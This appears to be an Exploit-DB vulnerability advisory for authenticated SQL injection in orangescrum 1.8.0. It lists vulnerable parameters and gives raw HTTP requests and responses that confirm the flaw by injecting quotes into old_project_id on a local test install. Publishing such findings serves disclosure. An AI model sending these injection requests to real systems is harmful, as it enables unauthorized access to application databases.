orangescrum 1.8.0 - 'Multiple' SQL Injection (Authenticated)

vendor:

orangescrum

by:

Hubert Wojciechowski

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: orangescrum

Affected Version From: 1.8.2000

Affected Version To: 1.8.2000

Patch Exists: NO

Related CWE:

CPE: a:orangescrum:orangescrum:1.8.0

Metasploit:

Other Scripts:

Platforms Tested: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23

2021

orangescrum 1.8.0 – ‘Multiple’ SQL Injection (Authenticated)

The orangescrum version 1.8.0 is vulnerable to multiple SQL injection attacks. An authenticated user can manipulate certain parameters to execute arbitrary SQL queries.

Mitigation:

The vendor should release a patch to fix the SQL injection vulnerabilities. In the meantime, users are advised to update to the latest version of the software and apply proper input validation and parameterization techniques to prevent SQL injection attacks.

Source

Exploit-DB raw data:

# Exploit Title: orangescrum 1.8.0 - 'Multiple' SQL Injection (Authenticated)
# Date: 28/11/2021
# Exploit Author: Hubert Wojciechowski
# Contact Author: snup.php@gmail.com
# Company: https://redteam.pl
# Vendor Homepage: https://www.orangescrum.org/
# Software Link: https://www.orangescrum.org/
# Version: 1.8.0
# Testeted on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23

### SQL Injection


# Authenticated user

-----------------------------------------------------------------------------------------------------------------------
# POC
-----------------------------------------------------------------------------------------------------------------------

## Example vuln parameters:

* project_id
* old_project_id
* uuid
* uniqid
* projid
* id
* caseno

-----------------------------------------------------------------------------------------------------------------------
-----------------------------------------------------------------------------------------------------------------------

## Example

-----------------------------------------------------------------------------------------------------------------------
Req old_project_id=1' - error
-----------------------------------------------------------------------------------------------------------------------

POST /orangescrum/easycases/move_task_to_project HTTP/1.1
Origin: http://127.0.0.1
Content-Length: 64
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Sec-Fetch-Site: same-origin
Host: 127.0.0.1:80
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Connection: close
X-Requested-With: XMLHttpRequest
Sec-Fetch-Mode: cors
Cookie: language=en-gb; currency=USD; CAKEPHP=onb8uaoqhe4kst0cj5koufc781; user_uniq_agent=9c7cba4c3dd1b2f7ace2dd877a58051a25561a365a6631f0; USER_UNIQ=e0bd28cc49dc2c60c80c7488b61c2aa2; USERTYP=2; USERTZ=28; USERSUB_TYPE=0; IS_MODERATOR=0; SES_TYPE=1; SES_COMP=1; CMP_CREATED=2021-11-28+10%3A52%3A11; COMP_UID=8b0e7877a94c648807ef19006c68edf9; DEFAULT_PAGE=dashboard; LISTVIEW_TYPE=comfort; LAST_CREATED_PROJ=3; TASKGROUPBY=duedate; ALL_PROJECT=all; CURRENT_FILTER=assigntome; STATUS=2
Referer: http://127.0.0.1/orangescrum/dashboard
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Sec-Fetch-Dest: empty

project_id=3&old_project_id=2'&case_id=2&case_no=1&is_multiple=0

-----------------------------------------------------------------------------------------------------------------------
Res:
-----------------------------------------------------------------------------------------------------------------------

HTTP/1.1 500 Internal Server Error
Date: Sun, 28 Nov 2021 12:42:30 GMT
Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
X-Powered-By: PHP/5.6.40
Set-Cookie: USER_UNIQ=e0bd28cc49dc2c60c80c7488b61c2aa2; expires=Sun, 28-Nov-2021 14:42:30 GMT; Max-Age=7200; path=/; domain=127.0.0.1
Set-Cookie: USERTYP=2; expires=Sun, 28-Nov-2021 14:42:30 GMT; Max-Age=7200; path=/; domain=127.0.0.1
Set-Cookie: USERTZ=28; expires=Sun, 28-Nov-2021 14:42:30 GMT; Max-Age=7200; path=/; domain=127.0.0.1
Set-Cookie: USERSUB_TYPE=0; expires=Sun, 28-Nov-2021 14:42:30 GMT; Max-Age=7200; path=/; domain=127.0.0.1
Set-Cookie: SES_TYPE=1; expires=Sun, 28-Nov-2021 14:42:30 GMT; Max-Age=7200; path=/; domain=127.0.0.1
Set-Cookie: SES_COMP=1; expires=Sun, 28-Nov-2021 14:42:30 GMT; Max-Age=7200; path=/; domain=127.0.0.1
Set-Cookie: CMP_CREATED=2021-11-28+10%3A52%3A11; expires=Sun, 28-Nov-2021 14:42:30 GMT; Max-Age=7200; path=/; domain=127.0.0.1
Set-Cookie: COMP_UID=8b0e7877a94c648807ef19006c68edf9; expires=Sun, 28-Nov-2021 14:42:30 GMT; Max-Age=7200; path=/; domain=127.0.0.1
Set-Cookie: USER_UNIQ=e0bd28cc49dc2c60c80c7488b61c2aa2; expires=Sun, 28-Nov-2021 14:42:30 GMT; Max-Age=7200; path=/; domain=127.0.0.1
Set-Cookie: USERTYP=2; expires=Sun, 28-Nov-2021 14:42:30 GMT; Max-Age=7200; path=/; domain=127.0.0.1
Set-Cookie: USERTZ=28; expires=Sun, 28-Nov-2021 14:42:30 GMT; Max-Age=7200; path=/; domain=127.0.0.1
Set-Cookie: USERSUB_TYPE=0; expires=Sun, 28-Nov-2021 14:42:30 GMT; Max-Age=7200; path=/; domain=127.0.0.1
Set-Cookie: SES_TYPE=1; expires=Sun, 28-Nov-2021 14:42:30 GMT; Max-Age=7200; path=/; domain=127.0.0.1
Set-Cookie: SES_COMP=1; expires=Sun, 28-Nov-2021 14:42:30 GMT; Max-Age=7200; path=/; domain=127.0.0.1
Set-Cookie: CMP_CREATED=2021-11-28+10%3A52%3A11; expires=Sun, 28-Nov-2021 14:42:30 GMT; Max-Age=7200; path=/; domain=127.0.0.1
Set-Cookie: COMP_UID=8b0e7877a94c648807ef19006c68edf9; expires=Sun, 28-Nov-2021 14:42:30 GMT; Max-Age=7200; path=/; domain=127.0.0.1
Content-Length: 132182
Vary: User-Agent
Expires: access 12 month
Connection: close
[...]

-----------------------------------------------------------------------------------------------------------------------
Req old_project_id=1'' - not error
-----------------------------------------------------------------------------------------------------------------------

POST /orangescrum/easycases/move_task_to_project HTTP/1.1
Origin: http://127.0.0.1
Content-Length: 66
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Sec-Fetch-Site: same-origin
Host: 127.0.0.1:80
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Connection: close
X-Requested-With: XMLHttpRequest
Sec-Fetch-Mode: cors
Cookie: language=en-gb; currency=USD; CAKEPHP=onb8uaoqhe4kst0cj5koufc781; user_uniq_agent=9c7cba4c3dd1b2f7ace2dd877a58051a25561a365a6631f0; USER_UNIQ=e0bd28cc49dc2c60c80c7488b61c2aa2; USERTYP=2; USERTZ=28; USERSUB_TYPE=0; IS_MODERATOR=0; SES_TYPE=1; SES_COMP=1; CMP_CREATED=2021-11-28+10%3A52%3A11; COMP_UID=8b0e7877a94c648807ef19006c68edf9; DEFAULT_PAGE=dashboard; LISTVIEW_TYPE=comfort; LAST_CREATED_PROJ=3; TASKGROUPBY=duedate; ALL_PROJECT=all; CURRENT_FILTER=assigntome; STATUS=2
Referer: http://127.0.0.1/orangescrum/dashboard
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Sec-Fetch-Dest: empty

project_id=3&old_project_id=2'';&case_id=2&case_no=1&is_multiple=0

-----------------------------------------------------------------------------------------------------------------------
Res
-----------------------------------------------------------------------------------------------------------------------

HTTP/1.1 200 OK
Date: Sun, 28 Nov 2021 12:51:23 GMT
Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
X-Powered-By: PHP/5.6.40
Set-Cookie: USER_UNIQ=e0bd28cc49dc2c60c80c7488b61c2aa2; expires=Sun, 28-Nov-2021 14:51:23 GMT; Max-Age=7200; path=/; domain=127.0.0.1
Set-Cookie: USERTYP=2; expires=Sun, 28-Nov-2021 14:51:23 GMT; Max-Age=7200; path=/; domain=127.0.0.1
Set-Cookie: USERTZ=28; expires=Sun, 28-Nov-2021 14:51:23 GMT; Max-Age=7200; path=/; domain=127.0.0.1
Set-Cookie: USERSUB_TYPE=0; expires=Sun, 28-Nov-2021 14:51:23 GMT; Max-Age=7200; path=/; domain=127.0.0.1
Set-Cookie: SES_TYPE=1; expires=Sun, 28-Nov-2021 14:51:23 GMT; Max-Age=7200; path=/; domain=127.0.0.1
Set-Cookie: SES_COMP=1; expires=Sun, 28-Nov-2021 14:51:23 GMT; Max-Age=7200; path=/; domain=127.0.0.1
Set-Cookie: CMP_CREATED=2021-11-28+10%3A52%3A11; expires=Sun, 28-Nov-2021 14:51:23 GMT; Max-Age=7200; path=/; domain=127.0.0.1
Set-Cookie: COMP_UID=8b0e7877a94c648807ef19006c68edf9; expires=Sun, 28-Nov-2021 14:51:23 GMT; Max-Age=7200; path=/; domain=127.0.0.1
Vary: User-Agent
Expires: access 12 month
Content-Length: 1
Connection: close
Content-Type: text/html; charset=UTF-8

0